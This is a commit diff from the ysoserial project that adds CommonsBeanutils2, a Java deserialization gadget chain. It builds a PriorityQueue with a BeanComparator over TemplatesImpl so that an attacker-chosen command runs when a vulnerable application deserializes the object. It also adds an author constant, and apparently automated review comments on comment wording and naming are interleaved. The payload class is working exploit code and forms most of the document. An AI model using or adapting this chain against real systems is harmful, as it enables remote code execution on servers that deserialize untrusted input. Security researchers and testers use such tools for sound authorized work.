add CommonsBeanutils2 (#163)
k4n5ha0 authored Apr 27, 2022
1 parent 4ad1131 commit 15e6aa6
Showing 2 changed files with 46 additions and 1 deletion.
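--- a/src/main/java/ysoserial/payloads/CommonsBeanutils2.java
+++ b/src/main/java/ysoserial/payloads/CommonsBeanutils2.java
@@ -0,0 +1,44 @@
+package ysoserial.payloads;
+
+import org.apache.commons.beanutils.BeanComparator;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+import java.util.PriorityQueue;
+
+// Origin Detective is PHITHON From
+// https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
+@Authors({Authors.K4n5ha0})
+public class CommonsBeanutils2 implements ObjectPayload<Object> {
+
+public Object getObject(final String command) throws Exception {
+final Object templates = Gadgets.createTemplatesImpl(command);
+// mock method name until armed
+final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+
+// create queue with numbers and basic comparator
+final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+// stub data for replacement later
+queue.add("1");
+queue.add("1");
+
+// switch method called by comparator
+Reflections.setFieldValue(comparator, "property", "outputProperties");
+
+// switch contents of queue
+final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+queueArray[0] = templates;
+queueArray[1] = templates;
+
+return queue;
+}
+
+public static void main(final String[] args) throws Exception {
+PayloadRunner.run(CommonsBeanutils2.class, args);
+}
+}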
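Review bot: Two inline comments in `getObject` describe different code than the lines beneath them: `// mock method name until armed` sits on a `BeanComparator` constructed with a `null` property, and `// create queue with numbers and basic comparator` sits on a queue that is filled with the string `"1"`. I would change them to `// property left null until the queue is populated` and `// queue of two placeholder strings using the comparator above`. The class also has no Javadoc, and the attribution line `// Origin Detective is PHITHON From` is hard to parse; a short header such as `/** Variant whose only declared dependency is commons-beanutils 1.9.2; technique credited to the article linked below. */` would make clear to anyone assessing exposure that this library on the classpath is the relevant condition. Since the chain is only reachable where untrusted bytes are deserialized, the header could also point readers at `ObjectInputFilter` allow-listing as the control that applies.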
3 changes: 2 additions & 1 deletion src/main/java/ysoserial/payloads/annotation/Authors.java
@@ -15,7 +15,7 @@
String MBECHLER = "mbechler";
String JACKOFMOSTTRADES = "JackOfMostTrades";
String MATTHIASKAISER = "matthias_kaiser";
String GEBL = "gebl" ;
String GEBL = "gebl";
String JACOBAINES = "jacob-baines";
String JASINNER = "jasinner";
String KULLRICH = "kai_ullrich";
@@ -30,6 +30,7 @@
String NAVALORENZO = "navalorenzo";
String JANG = "Jang";
String ARTSPLOIT = "artsploit";
String K4n5ha0 = "k4n5ha0";

String[] value() default {};

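Review bot: The constant `K4n5ha0`, which looks like the line this section adds, is the only mixed-case name among the author constants shown (`NAVALORENZO`, `JANG`, `ARTSPLOIT`), so it breaks the interface's upper-case convention. I would declare it as `String K4N5HA0 = "k4n5ha0";` and reference it as `@Authors({Authors.K4N5HA0})` in CommonsBeanutils2.java. The annotation's body starts and ends outside the hunks shown.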
